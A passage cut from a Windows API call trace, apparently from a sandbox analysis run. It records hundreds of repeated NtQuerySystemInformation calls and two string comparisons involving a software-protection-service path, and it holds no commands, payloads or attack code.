(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0280.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0280.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0280.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0280.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0280.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0a0, Length=0x28, ResultLength=0x0) [0280.319] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0280.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x28, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0280.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0a0, Length=0x28, ResultLength=0x0) [0280.329] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x28, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0280.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, 